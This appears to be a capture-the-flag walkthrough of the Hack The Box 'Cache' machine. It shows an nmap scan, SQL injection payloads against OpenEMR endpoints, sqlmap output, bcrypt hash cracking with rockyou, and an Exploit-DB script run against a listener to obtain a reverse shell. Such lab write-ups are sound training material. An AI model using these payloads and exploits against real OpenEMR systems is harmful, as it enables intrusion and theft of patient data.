# Nmap 7.80 scan initiated Fri Jun 12 13:19:40 2020 as: nmap -sSVC -p- -oA nmap_full 10.10.10.188 Nmap scan report for 10.10.10.188 Host is up (0.021s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA) | 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA) |_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Cache Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jun 12 13:20:07 2020 -- 1 IP address (1 host up) scanned in 26.73 seconds
There are many exploits but we don't know which version this is.
Usually I never go to EDB website and only use searchsploit, but this time
we don't know the version used, the only thing we know is that is was a version
probably released in 2018 as the copyright is from 2018.
By searching on EDB website, we have the date of publication of the exploit.
So with some luck we can begin with the exploits published in 2018.
Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.188 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the OpenEMR installation VHOST hms.htb no HTTP server virtual host
When we run it we can see the exploit works, but it seems poorly written because
it is trying to dump all system tables (295) and it's pretty slow.
1 2 3 4 5 6 7 8
msf5 auxiliary(sqli/openemr/openemr_sqli_dump) > run [*] Running module against 10.10.10.188
[*] DB Version: 5.7.30-0ubuntu0.18.04.1 [*] Enumerating tables, this may take a moment... [*] Identified 295 tables. [*] Dumping table (1/295): CHARACTER_SETS [*] Dumping table (2/295): COLLATIONS
So let's exit that, the msf module will take hours to extract all those useless
tables.
Now we know the this SQLi is working let's see what exploit it is exactly:
Provided by: Will Porter <will.porter@lodestonesecurity.com>
Check supported: Yes
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.188 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the OpenEMR installation VHOST hms.htb no HTTP server virtual host
Description: This module exploits a SQLi vulnerability found in OpenEMR version 5.0.1 Patch 6 and lower. The vulnerability allows the contents of the entire database (with exception of log and task tables) to be extracted. This module saves each table as a `.csv` file in your loot directory and has been tested with OpenEMR 5.0.1 (3).
In metasploit you can use the edit command to open your default editor on
the source code of the module.
By doing that I read the code of the msf module and saw how to detect openEMR
version with method openemr_version:
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:51:36 /2020-07-14/
[21:51:36] [INFO] fetched random HTTP User-Agent header value 'Opera/8.51 (X11; Linux i686; U; en)' from file '/opt/sqlmap/data/txt/user-agents.txt' [21:51:37] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('OpenEMR=b9g6um1rbhc...dmd5cln601'). Do you want to use those [Y/n] n [21:52:08] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS [21:52:08] [INFO] testing if the target URL content is stable [21:52:38] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [21:54:08] [CRITICAL] connection timed out to the target URL [21:54:08] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c [21:54:24] [CRITICAL] can't check dynamic content because of lack of page content [21:54:24] [INFO] heuristic (basic) test shows that GET parameter 'enc' might be injectable (possible DBMS: 'MySQL') [21:54:24] [INFO] testing for SQL injection on GET parameter 'enc' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n [21:54:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [21:55:29] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests [21:55:29] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [21:56:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [21:57:55] [CRITICAL] connection timed out to the target URL [21:58:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [21:59:55] [CRITICAL] connection timed out to the target URL [22:00:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) [22:01:55] [CRITICAL] connection timed out to the target URL [22:02:25] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s) there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N] N [22:03:36] [ERROR] user quit [22:03:36] [WARNING] you haven't updated sqlmap for more than 84 days!!!
[*] ending @ 22:03:36 /2020-07-14/
It's kinda working but pretty slow and unstable, so let's find another endpoint as it seems there
are many SQLi.
portal/find_appt_popup_user.php?catid=1' AND (SELECT 0FROM(SELECT COUNT(*),CONCAT(@@VERSION,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -
portal/add_edit_event_user.php?eid=1 AND EXTRACTVALUE(0,CONCAT(0x5c,VERSION()))
interface/forms/eye_mag/php/Anything_simple.php?display=i&encounter=1' AND (SELECT 0 FROM(SELECT COUNT(*),CONCAT(@@VERSION,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -&category_name=POSTSEG
interface/forms_admin/forms_admin.php?id=32' OR (SELECT 0 FROM(SELECT COUNT(*),CONCAT(@@VERSION,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -&method=enable
The ones in 3.1 and 3.2 (portal) seems to give a SQL error while those from 3.3
to 3.9 seem to require authentication.
Those two request won't works because we need valid cookies even if the attack is unauthenticated.
Also we need to fill the registration form with random data even if we never receive the confirmation email, this will set a valid cookie.
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:28:23 /2020-07-14/
[23:28:23] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1' from file '/opt/sqlmap/data/txt/user-agents.txt' [23:28:23] [INFO] resuming back-end DBMS 'mysql' [23:28:23] [INFO] testing connection to the target URL [23:28:23] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: eid (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: eid=(SELECT (CASE WHEN (8435=8435) THEN 1 ELSE (SELECT 1164 UNION SELECT 9741) END))
Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: eid=1 AND EXTRACTVALUE(4452,CONCAT(0x5c,0x71787a7a71,(SELECT (ELT(4452=4452,1))),0x717a716271))
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: eid=1 AND (SELECT 5294 FROM (SELECT(SLEEP(5)))KKhg)
Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7a71,0x73535a4b567775646f4d7849526d4b6d4a697572466f44734446724d5072526b7079474c6a616242,0x717a716271),NULL-- - --- [23:28:23] [INFO] the back-end DBMS is MySQL [23:28:23] [INFO] fetching banner back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL >= 5.1 banner: '5.7.30-0ubuntu0.18.04.1' [23:28:23] [INFO] fetched data logged to text files under '/home/noraj/.sqlmap/output/hms.htb' [23:28:23] [WARNING] you haven't updated sqlmap for more than 84 days!!!
[*] ending @ 23:28:23 /2020-07-14/
Alternatively you can store the raw HTTP request in a file:
Let's put the hash in a file to crack it with [JtR][JtR]:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
$ printf %s '$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.' > hash.txt $ john -w /usr/share/wordlists/password/rockyou.txt --format=bcrypt hash.txt Warning: invalid UTF-8 seen reading /usr/share/wordlists/password/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 32 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status xxxxxx (?) 1g 0:00:00:01 DONE (2020-07-15 00:51) 0.6369g/s 722.2p/s 722.2c/s 722.2C/s water..zombie Use the "--show" option to display all of the cracked passwords reliably Session completed $ john --show hash.txt ?:xxxxxx
Copied to: /home/noraj/CTF/HackTheBox/machines/Cache/48515.py
Let's modify, the remote URL, the LHOST, LPORT, and admin creds.
Then start a listener & start the exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
$ pwncat -l 8888 -vv INFO: Listening on :::8888 (family 10/IPv6, TCP) INFO: Listening on 0.0.0.0:8888 (family 2/IPv4, TCP) INFO: Client connected from 10.10.10.188:32838 (family 2/IPv4, TCP) Linux cache 4.15.0-109-generic #110-Ubuntu SMP Tue Jun 23 02:39:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 23:11:40 up 32 min, 0 users, load average: 0.07, 0.02, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
$ python2 48515.py [+] Authentication with credentials provided please be patient [+] Uploading a payload it will take a minute [+] You should be getting a shell
$ telnet 127.0.0.1 11211 telnet 127.0.0.1 11211 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. version version VERSION 1.5.6 Ubuntu